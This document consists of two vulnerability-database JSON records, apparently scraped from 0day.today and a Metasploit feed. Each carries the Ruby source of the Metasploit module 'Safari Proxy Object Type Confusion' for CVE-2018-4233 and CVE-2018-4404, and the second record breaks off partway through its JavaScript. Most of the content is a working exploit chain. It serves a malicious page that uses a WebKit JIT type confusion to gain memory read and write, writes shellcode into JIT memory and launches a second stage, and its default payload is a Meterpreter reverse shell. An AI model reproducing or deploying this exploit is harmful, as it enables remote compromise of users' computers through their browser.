{"id": "1337DAY-ID-31793", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "Safari - Proxy Object Type Confusion Exploit", "description": "", "published": "2018-12-14T00:00:00", "modified": "2018-12-14T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/31793", "reporter": "metasploit", "references": [], "cvelist": ["CVE-2018-4404", "CVE-2018-4233"], "immutableFields": [], "lastseen": "2021-12-25T17:29:50", "viewCount": 25, "enchantments": {"score": {"value": 7.8, "vector": "NONE"}, "dependencies": {"references": [{"type": "apple", "idList": ["APPLE:2CC9CC6696C851FEE406173FD30C626B", "APPLE:3E3CB5751137153F5BC9BA4A69ABC13D", "APPLE:46FC3BE0AB2D06D5552B4830DD9B604B", "APPLE:CBA8BD9BD1E4F4D2B32B5AB72B152FD0", "APPLE:CE6F94AC8696CA2A528378EF9D7F69D6", "APPLE:E812EA31700014D3FE21E3572E9BD5B3", "APPLE:E86C067FDA2C97D52BE9FC136361BDF7", "APPLE:HT208848", "APPLE:HT208849", "APPLE:HT208850", "APPLE:HT208851", "APPLE:HT208852", "APPLE:HT208853", "APPLE:HT208854"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0017"]}, {"type": "cve", "idList": ["CVE-2018-4233", "CVE-2018-4404"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-4233"]}, {"type": "exploitdb", "idList": ["EDB-ID:45998"]}, {"type": "fedora", "idList": ["FEDORA:A7C5B60D2E0C", "FEDORA:EC42160A1040"]}, {"type": "gentoo", "idList": ["GLSA-201808-04"]}, {"type": "kaspersky", "idList": ["KLA11282"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS", "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS/", "MSF:EXPLOIT/OSX/BROWSER/SAFARI_PROXY_OBJECT_TYPE_CONFUSION", "MSF:EXPLOIT/OSX/BROWSER/SAFARI_PROXY_OBJECT_TYPE_CONFUSION/", "MSF:ILITIES/APPLE-ITUNES-CVE-2018-4233/", "MSF:ILITIES/APPLE-SAFARI-CVE-2018-4233/"]}, {"type": "nessus", "idList": ["700550.PRM", "APPLETV_11_4.NASL", "APPLE_IOS_114_CHECK.NBIN", "FEDORA_2018-118B9ABF99.NASL", "FEDORA_2018-AAC3CA8936.NASL", "GENTOO_GLSA-201808-04.NASL", "ITUNES_12_7_5.NASL", "ITUNES_12_7_5_BANNER.NASL", "MACOSX_SAFARI11_1_1.NASL", "MACOS_10_13_5.NASL", "OPENSUSE-2018-1288.NASL", "OPENSUSE-2018-845.NASL", "OPENSUSE-2019-566.NASL", "SUSE_SU-2018-2075-1.NASL", "SUSE_SU-2018-3387-1.NASL", "UBUNTU_USN-3687-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813509", "OPENVAS:1361412562310813513", "OPENVAS:1361412562310813514", "OPENVAS:1361412562310843564", "OPENVAS:1361412562310851975", "OPENVAS:1361412562310852089", "OPENVAS:1361412562310874687", "OPENVAS:1361412562310874747"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150779", "PACKETSTORM:153148"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:2285-1", "OPENSUSE-SU-2018:3473-1"]}, {"type": "ubuntu", "idList": ["USN-3687-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-4233"]}, {"type": "zdi", "idList": ["ZDI-18-1321", "ZDI-18-1338"]}, {"type": "zdt", "idList": ["1337DAY-ID-32828"]}], "rev": 4}, "backreferences": {"references": [{"type": "apple", "idList": ["APPLE:2CC9CC6696C851FEE406173FD30C626B", "APPLE:3E3CB5751137153F5BC9BA4A69ABC13D", "APPLE:46FC3BE0AB2D06D5552B4830DD9B604B", "APPLE:CBA8BD9BD1E4F4D2B32B5AB72B152FD0", "APPLE:CE6F94AC8696CA2A528378EF9D7F69D6", "APPLE:E812EA31700014D3FE21E3572E9BD5B3", "APPLE:E86C067FDA2C97D52BE9FC136361BDF7", "APPLE:HT208848", "APPLE:HT208849", "APPLE:HT208850", "APPLE:HT208851", "APPLE:HT208852", "APPLE:HT208853", "APPLE:HT208854"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0017"]}, {"type": "cve", "idList": ["CVE-2018-4233"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-4233"]}, {"type": "exploitdb", "idList": ["EDB-ID:45998"]}, {"type": "fedora", "idList": ["FEDORA:A7C5B60D2E0C", "FEDORA:EC42160A1040"]}, {"type": "gentoo", "idList": ["GLSA-201808-04"]}, {"type": "kaspersky", "idList": ["KLA11282"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS", "MSF:EXPLOIT/OSX/BROWSER/SAFARI_PROXY_OBJECT_TYPE_CONFUSION"]}, {"type": "nessus", "idList": ["APPLETV_11_4.NASL", "FEDORA_2018-AAC3CA8936.NASL", "GENTOO_GLSA-201808-04.NASL", "ITUNES_12_7_5.NASL", "MACOS_10_13_5.NASL", "OPENSUSE-2018-845.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813509", "OPENVAS:1361412562310813513", "OPENVAS:1361412562310813514", "OPENVAS:1361412562310874747"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150779", "PACKETSTORM:153148"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:2285-1"]}, {"type": "ubuntu", "idList": ["USN-3687-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-4233"]}, {"type": "zdi", "idList": ["ZDI-18-1321", "ZDI-18-1338"]}, {"type": "zdt", "idList": ["1337DAY-ID-32828"]}]}, "exploitation": null, "vulnersScore": 7.8}, "sourceHref": "https://0day.today/exploit/31793", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The JIT region is then replaced with shellcode which loads the second stage.\n The second stage exploits a logic error in libxpc, which uses command execution\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'saelo' ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2018-4404'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/saelo/pwn2own2018'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ],\n 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],\n 'Platform' => 'osx',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },\n 'Targets' => [\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\n ],\n 'DisclosureDate' => 'Mar 15 2018'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n ])\n end\n\n def offset_table\n {\n '10.12.6' => {\n :jsc_vtab => '0x0000d8d8',\n :dyld_stub_loader => '0x00001168',\n :dlopen => '0x000027f7',\n :confstr => '0x00002c84',\n :strlen => '0x00001b40',\n :strlen_got => '0xdc0',\n },\n '10.13' => {\n :jsc_vtab => '0x0000e5f8',\n :dyld_stub_loader => '0x000012a8',\n :dlopen => '0x00002e60',\n :confstr => '0x000024fc',\n :strlen => '0x00001440',\n :strlen_got => '0xee8',\n },\n '10.13.3' => {\n :jsc_vtab => '0xe5e8',\n :dyld_stub_loader => '0x1278',\n :dlopen => '0x2e30',\n :confstr => '0x24dc',\n :strlen => '0x1420',\n :strlen_got => '0xee0',\n },\n }\n end\n\n def exploit_data(directory, file)\n path = ::File.join Msf::Config.data_directory, 'exploits', directory, file\n ::File.binread path\n end\n\n def stage1_js\n stage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\"\n \"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\"\n end\n\n def stage2_js\n stage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\"\n payload_cmd = payload.raw\n if target['Arch'] == ARCH_PYTHON\n payload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\"\n end\n placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')\n stage2[placeholder_index, payload_cmd.length] = payload_cmd\n \"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\"\n end\n\n def get_offsets(user_agent)\n if user_agent =~ /Intel Mac OS X (.*?)\\)/\n version = $1.gsub(\"_\", \".\")\n mac_osx_version = Gem::Version.new(version)\n if mac_osx_version >= Gem::Version.new('10.13.4')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif mac_osx_version < Gem::Version.new('10.12')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif offset_table.key?(version)\n offset = offset_table[version]\n return <<-EOF\nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};\nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};\nconst DLOPEN_OFFSET = #{offset[:dlopen]};\nconst CONFSTR_OFFSET = #{offset[:confstr]};\nconst STRLEN_OFFSET = #{offset[:strlen]};\nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]};\nEOF\n else\n print_warning \"No offsets for version #{mac_osx_version}\"\n end\n else\n print_warning \"Unexpected User-Agent\"\n end\n return false\n end\n\n def on_request_uri(cli, request)\n user_agent = request['User-Agent']\n print_status(\"Request from #{user_agent}\")\n offsets = get_offsets(user_agent)\n unless offsets\n send_not_found(cli)\n return\n end\n\n utils = exploit_data \"CVE-2018-4233\", \"utils.js\"\n int64 = exploit_data \"CVE-2018-4233\", \"int64.js\"\n html = %Q^\n<html>\n<body>\n<script>\n#{stage1_js}\nstage1.replace = function(oldVal, newVal) {\n for (var idx = 0; idx < this.length; idx++) {\n var found = true;\n for (var j = idx; j < idx + 8; j++) {\n if (this[j] != oldVal.byteAt(j - idx)) {\n found = false;\n break;\n }\n }\n if (found)\n break;\n }\n this.set(newVal.bytes(), idx);\n};\n#{stage2_js}\n#{utils}\n#{int64}\n#{offsets}\n\nvar ready = new Promise(function(resolve) {\n if (typeof(window) === 'undefined')\n resolve();\n else\n window.onload = function() {\n resolve();\n }\n});\n\nready = Promise.all([ready]);\n\nprint = function(msg) {\n //console.log(msg);\n //document.body.innerText += msg + '\\\\n';\n}\n\n// Must create this indexing type transition first,\n// otherwise the JIT will deoptimize later.\nvar a = [13.37, 13.37];\na[0] = {};\n\nvar referenceFloat64Array = new Float64Array(0x1000);\n\n//\n// Bug: the DFG JIT does not take into account that, through the use of a\n// Proxy, it is possible to run arbitrary JS code during the execution of a\n// CreateThis operation. This makes it possible to change the structure of e.g.\n// an argument without causing a bailout, leading to a type confusion.\n//\n\n//\n// addrof primitive\n//\nfunction setupAddrof() {\n function InfoLeaker(a) {\n this.address = a[0];\n }\n\n var trigger = false;\n var leakme = null;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = leakme;\n return target[propname];\n },\n };\n var InfoLeakerProxy = new Proxy(InfoLeaker, handler);\n\n for (var i = 0; i < 100000; i++) {\n new InfoLeakerProxy([1.1, 2.2, 3.3]);\n }\n\n trigger = true;\n\n return function(obj) {\n leakme = obj;\n arg = [1.1, 1.1];\n var o = new InfoLeakerProxy(arg);\n return o.address;\n };\n}\n\n//\n// fakeobj primitive\n//\nfunction setupFakeobj() {\n function ObjFaker(a, address) {\n a[0] = address;\n }\n\n var trigger = false;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = {};\n return target[propname];\n },\n };\n var ObjFakerProxy = new Proxy(ObjFaker, handler);\n\n for (var i = 0; i < 100000; i++) {\n new ObjFakerProxy([1.1, 2.2, 3.3], 13.37);\n }\n\n trigger = true;\n\n return function(address) {\n arg = [1.1, 1.1];\n var o = new ObjFakerProxy(arg, address);\n return arg[0];\n };\n}\n\nfunction makeJITCompiledFunction() {\n // Some code to avoid inlining...\n function target(num) {\n for (var i = 2; i < num; i++) {\n if (num % i === 0) {\n return false;\n }\n }\n return true;\n }\n\n // Force JIT compilation.\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n for (var i = 0; i < 1000; i++) {\n target(i);\n }\n return target;\n}\n\nfunction pwn() {\n // Spray Float64Array structures so that structure ID 0x1000 will\n // be a Float64Array with very high probability\n var structs = [];\n for (var i = 0; i < 0x1000; i++) {\n var a = new Float64Array(1);\n a['prop' + i] = 1337;\n structs.push(a);\n }\n\n // Setup exploit primitives\n var addrofOnce = setupAddrof();\n var fakeobjOnce = setupFakeobj();\n\n // (Optional) Spray stuff to keep the background GC busy and increase reliability even further\n /*\n var stuff = [];\n for (var i = 0; i < 0x100000; i++) {\n stuff.push({foo: i});\n }\n */\n\n var float64MemView = new Float64Array(0x200);\n var uint8MemView = new Uint8Array(0x1000);\n\n // Setup container to host the fake Float64Array\n var jsCellHeader = new Int64([\n 00, 0x10, 00, 00, // m_structureID\n 0x0, // m_indexingType\n 0x2b, // m_type\n 0x08, // m_flags\n 0x1 // m_cellState\n ]);\n\n var container = {\n jsCellHeader: jsCellHeader.asJSValue(),\n butterfly: null,\n vector: float64MemView,\n length: (new Int64('0x0001000000001337')).asJSValue(),\n mode: {}, // an empty object, we'll need that later\n };\n\n // Leak address and inject fake object\n // RawAddr == address in float64 form\n var containerRawAddr = addrofOnce(container);\n var fakeArrayAddr = Add(Int64.fromDouble(containerRawAddr), 16);\n print(\"[+] Fake Float64Array @ \" + fakeArrayAddr);\n\n ///\n /// BEGIN CRITICAL SECTION\n ///\n /// Objects are corrupted, a GC would now crash the process.\n /// We'll try to repair everything as quickly as possible and with a minimal amount of memory allocations.\n ///\n var driver = fakeobjOnce(fakeArrayAddr.asDouble());\n while (!(driver instanceof Float64Array)) {\n jsCellHeader.assignAdd(jsCellHeader, Int64.One);\n container.jsCellHeader = jsCellHeader.asJSValue();\n }\n\n // Get some addresses that we'll need to repair our objects. We'll abuse the .mode\n // property of the container to leak addresses.\n driver[2] = containerRawAddr;\n var emptyObjectRawAddr = float64MemView[6];\n container.mode = referenceFloat64Array;\n var referenceFloat64ArrayRawAddr = float64MemView[6];\n\n // Fixup the JSCell header of the container to make it look like an empty object.\n // By default, JSObjects have an inline capacity of 6, enough to hold the fake Float64Array.\n driver[2] = emptyObjectRawAddr;\n var header = float64MemView[0];\n driver[2] = containerRawAddr;\n float64MemView[0] = header;\n\n // Copy the JSCell header from an existing Float64Array and set the butterfly to zero.\n // Also set the mode: make it look like an OversizeTypedArray for easy GC survival\n // (see JSGenericTypedArrayView<Adaptor>::visitChildren).\n driver[2] = referenceFloat64ArrayRawAddr;\n var header = float64MemView[0];\n var length = float64MemView[3];\n var mode = float64MemView[4];\n driver[2] = containerRawAddr;\n float64MemView[2] = header;\n float64MemView[3] = 0;\n float64MemView[5] = length;\n float64MemView[6] = mode;\n\n // Root the container object so it isn't garbage collected.\n // This will allocate a butterfly for the fake object and store a reference to the container there.\n // The fake array itself is rooted by the memory object (closures).\n driver.container = container;\n\n ///\n /// END CRITICAL SECTION\n ///\n /// Objects are repaired, we will now survive a GC\n ///\n if (typeof(gc) !== 'undefined')\n gc();\n\n memory = {\n read: function(addr, length) {\n driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n var a = new Array(length);\n for (var i = 0; i < length; i++)\n a[i] = uint8MemView[i];\n return a;\n },\n\n write: function(addr, data) {\n driver[2] = memory.addrof(uint8MemView).asDouble();\n float64MemView[2] = addr.asDouble();\n for (var i = 0; i < data.length; i++)\n uint8MemView[i] = data[i];\n },\n\n read8: function(addr) {\n driver[2] = addr.asDouble();\n return Int64.fromDouble(float64MemView[0]);\n },\n\n write8: function(addr, value) {\n driver[2] = addr.asDouble();\n float64MemView[0] = value.asDouble();\n },\n\n addrof: function(obj) {\n float64MemView.leakme = obj;\n var butterfly = Int64.fromDouble(driver[1]);\n return memory.read8(Sub(butterfly, 0x10));\n },\n };\n\n print(\"[+] Got stable memory read/write!\");\n\n // Find binary base\n var funcAddr = memory.addrof(Math.sin);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n var codeAddr = memory.read8(Add(executableAddr, 24));\n var vtabAddr = memory.read8(codeAddr);\n var jscBaseUnaligned = Sub(vtabAddr, JSC_VTAB_OFFSET);\n print(\"[*] JavaScriptCore.dylib @ \" + jscBaseUnaligned);\n var jscBase = And(jscBaseUnaligned, new Int64(\"0x7ffffffff000\"));\n print(\"[*] JavaScriptCore.dylib @ \" + jscBase);\n\n var dyldStubLoaderAddr = memory.read8(jscBase);\n var dyldBase = Sub(dyldStubLoaderAddr, DYLD_STUB_LOADER_OFFSET);\n var strlenAddr = memory.read8(Add(jscBase, STRLEN_GOT_OFFSET));\n var libCBase = Sub(strlenAddr, STRLEN_OFFSET);\n print(\"[*] dyld.dylib @ \" + dyldBase);\n print(\"[*] libsystem_c.dylib @ \" + libCBase);\n\n var confstrAddr = Add(libCBase, CONFSTR_OFFSET);\n print(\"[*] confstr @ \" + confstrAddr);\n var dlopenAddr = Add(dyldBase, DLOPEN_OFFSET);\n print(\"[*] dlopen @ \" + dlopenAddr);\n\n // Patching shellcode\n var stage2Addr = memory.addrof(stage2);\n stage2Addr = memory.read8(Add(stage2Addr, 16));\n print(\"[*] Stage 2 payload @ \" + stage2Addr);\n\n stage1.replace(new Int64(\"0x4141414141414141\"), confstrAddr);\n stage1.replace(new Int64(\"0x4242424242424242\"), stage2Addr);\n stage1.replace(new Int64(\"0x4343434343434343\"), new Int64(stage2.length));\n stage1.replace(new Int64(\"0x4444444444444444\"), dlopenAddr);\n print(\"[+] Shellcode patched\");\n\n // Leak JITCode pointer poison value\n var poison_addr = Add(jscBase, 305152);\n print(\"[*] Poison value @ \" + poison_addr);\n var poison = memory.read8(poison_addr);\n print(\"[*] Poison value: \" + poison);\n\n // Shellcode\n var func = makeJITCompiledFunction();\n var funcAddr = memory.addrof(func);\n print(\"[+] Shellcode function object @ \" + funcAddr);\n var executableAddr = memory.read8(Add(funcAddr, 24));\n print(\"[+] Executable instance @ \" + executableAddr);\n var jitCodeAddr = memory.read8(Add(executableAddr, 24));\n print(\"[+] JITCode instance @ \" + jitCodeAddr);\n\n var codeAddrPoisoned = memory.read8(Add(jitCodeAddr, 32));\n var codeAddr = Xor(codeAddrPoisoned, poison);\n print(\"[+] RWX memory @ \" + codeAddr.toString());\n print(\"[+] Writing shellcode...\");\n var origCode = memory.read(codeAddr, stage1.length);\n memory.write(codeAddr, stage1);\n\n print(\"[!] Jumping into shellcode...\");\n var res = func();\n if (res === 0) {\n print(\"[+] Shellcode executed sucessfully!\");\n } else {\n print(\"[-] Shellcode failed to execute: error \" + res);\n }\n\n memory.write(codeAddr, origCode);\n print(\"[*] Restored previous JIT code\");\n\n print(\"[+] We are done here, continuing WebContent process as if nothing happened =)\");\n if (typeof(gc) !== 'undefined')\n gc();\n}\n\nready.then(function() {\n try {\n pwn();\n } catch (e) {\n print(\"[-] Exception caught: \" + e);\n }\n}).catch(function(err) {\n print(\"[-] Initializatin failed\");\n});\n\n</script>\n</body>\n</html>\n ^\n unless datastore['DEBUG_EXPLOIT']\n html.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '')\n end\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\n\nend\n", "category": "remote exploits", "verified": true, "_state": {"dependencies": 1645698334}}

{"metasploit": [{"lastseen": "2020-10-14T01:51:02", "description": "This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The JIT region is then replaced with shellcode which loads the second stage. The second stage exploits a logic error in libxpc, which uses command execution via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-11-15T00:44:18", "type": "metasploit", "title": "Safari Proxy Object Type Confusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233", "CVE-2018-4404"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/OSX/BROWSER/SAFARI_PROXY_OBJECT_TYPE_CONFUSION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Post::File\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The JIT region is then replaced with shellcode which loads the second stage.\n The second stage exploits a logic error in libxpc, which uses command execution\n via the launchd's \"spawn_via_launchd\" API (CVE-2018-4404).\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'saelo' ],\n 'References' => [\n ['CVE', '2018-4233'],\n ['CVE', '2018-4404'],\n ['URL', 'https://github.com/saelo/cve-2018-4233'],\n ['URL', 'https://github.com/saelo/pwn2own2018'],\n ['URL', 'https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf'],\n ],\n 'Arch' => [ ARCH_PYTHON, ARCH_CMD ],\n 'Platform' => 'osx',\n 'DefaultTarget' => 0,\n 'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' },\n 'Targets' => [\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\n ],\n 'DisclosureDate' => '2018-03-15'))\n register_advanced_options([\n OptBool.new('DEBUG_EXPLOIT', [false, \"Show debug information in the exploit javascript\", false]),\n ])\n end\n\n def offset_table\n {\n '10.12.6' => {\n :jsc_vtab => '0x0000d8d8',\n :dyld_stub_loader => '0x00001168',\n :dlopen => '0x000027f7',\n :confstr => '0x00002c84',\n :strlen => '0x00001b40',\n :strlen_got => '0xdc0',\n },\n '10.13' => {\n :jsc_vtab => '0x0000e5f8',\n :dyld_stub_loader => '0x000012a8',\n :dlopen => '0x00002e60',\n :confstr => '0x000024fc',\n :strlen => '0x00001440',\n :strlen_got => '0xee8',\n },\n '10.13.3' => {\n :jsc_vtab => '0xe5e8',\n :dyld_stub_loader => '0x1278',\n :dlopen => '0x2e30',\n :confstr => '0x24dc',\n :strlen => '0x1420',\n :strlen_got => '0xee0',\n },\n }\n end\n\n def stage1_js\n stage1 = exploit_data \"CVE-2018-4233\", \"stage1.bin\"\n \"var stage1 = new Uint8Array([#{Rex::Text::to_num(stage1)}]);\"\n end\n\n def stage2_js\n stage2 = exploit_data \"CVE-2018-4404\", \"stage2.dylib\"\n payload_cmd = payload.raw\n if target['Arch'] == ARCH_PYTHON\n payload_cmd = \"echo \\\"#{payload_cmd}\\\" | python\"\n end\n placeholder_index = stage2.index('PAYLOAD_CMD_PLACEHOLDER')\n stage2[placeholder_index, payload_cmd.length] = payload_cmd\n \"var stage2 = new Uint8Array([#{Rex::Text::to_num(stage2)}]);\"\n end\n\n def get_offsets(user_agent)\n if user_agent =~ /Intel Mac OS X (.*?)\\)/\n osx_version = $1.gsub(\"_\", \".\")\n if user_agent =~ /Version\\/(.*?) /\n if Gem::Version.new($1) >= Gem::Version.new('11.1.1')\n print_warning \"Safari version #{$1} is not vulnerable\"\n return false\n else\n print_good \"Safari version #{$1} appears to be vulnerable\"\n end\n end\n mac_osx_version = Gem::Version.new(osx_version)\n if mac_osx_version >= Gem::Version.new('10.13.4')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif mac_osx_version < Gem::Version.new('10.12')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif offset_table.key?(osx_version)\n offset = offset_table[osx_version]\n return <<-EOF\nconst JSC_VTAB_OFFSET = #{offset[:jsc_vtab]};\nconst DYLD_STUB_LOADER_OFFSET = #{offset[:dyld_stub_loader]};\nconst DLOPEN_OFFSET = #{offset[:dlopen]};\nconst CONFSTR_OFFSET = #{offset[:confstr]};\nconst STRLEN_OFFSET = #{offset[:strlen]};\nconst STRLEN_GOT_OFFSET = #{offset[:strlen_got]};\nEOF\n else\n print_warning \"No offsets for version #{mac_osx_version}\"\n end\n else\n print_warning \"Unexpected User-Agent\"\n end\n return false\n end\n\n def on_request_uri(cli, request)\n user_agent = request['User-Agent']\n print_status(\"Request from #{user_agent}\")\n offsets = get_offsets(user_agent)\n unless offsets\n send_not_found(cli)\n return\n end\n\n utils = exploit_data \"javascript_utils\", \"utils.js\"\n int64 = exploit_data \"javascript_utils\", \"int64.js\"\n html = %Q^\n<html>\n<body>\n<script>\n#{stage1_js}\nstage1.replace = function(oldVal, newVal) {\n for (var idx = 0; idx < this.length; idx++) {\n var found = true;\n for (var j = idx; j < idx + 8; j++) {\n if (this[j] != oldVal.byteAt(j - idx)) {\n found = false;\n break;\n }\n }\n if (found)\n break;\n }\n this.set(newVal.bytes(), idx);\n};\n#{stage2_js}\n#{utils}\n#{int64}\n#{offsets}\n\nvar ready = new Promise(function(resolve) {\n if (typeof(window) === 'undefined')\n resolve();\n else\n window.onload = function() {\n resolve();\n }\n});\n\nready = Promise.all([ready]);\n\nprint = function(msg) {\n //console.log(msg);\n //document.body.innerText += msg + '\\\\n';\n}\n\n// Must create this indexing type transition first,\n// otherwise the JIT will deoptimize later.\nvar a = [13.37, 13.37];\na[0] = {};\n\nvar referenceFloat64Array = new Float64Array(0x1000);\n\n//\n// Bug: the DFG JIT does not take into account that, through the use of a\n// Proxy, it is possible to run arbitrary JS code during the execution of a\n// CreateThis operation. This makes it possible to change the structure of e.g.\n// an argument without causing a bailout, leading to a type confusion.\n//\n\n//\n// addrof primitive\n//\nfunction setupAddrof() {\n function InfoLeaker(a) {\n this.address = a[0];\n }\n\n var trigger = false;\n var leakme = null;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = leakme;\n return target[propname];\n },\n };\n var InfoLeakerProxy = new Proxy(InfoLeaker, handler);\n\n for (var i = 0; i < 100000; i++) {\n new InfoLeakerProxy([1.1, 2.2, 3.3]);\n }\n\n trigger = true;\n\n return function(obj) {\n leakme = obj;\n arg = [1.1, 1.1];\n var o = new InfoLeakerProxy(arg);\n return o.address;\n };\n}\n\n//\n// fakeobj primitive\n//\nfunction setupFakeobj() {\n function ObjFaker(a, address) {\n a[0] = address;\n }\n\n var trigger = false;\n var arg = null;\n\n var handler = {\n get(target, propname) {\n if (trigger)\n arg[0] = {};\n return target[propname];\n },\n 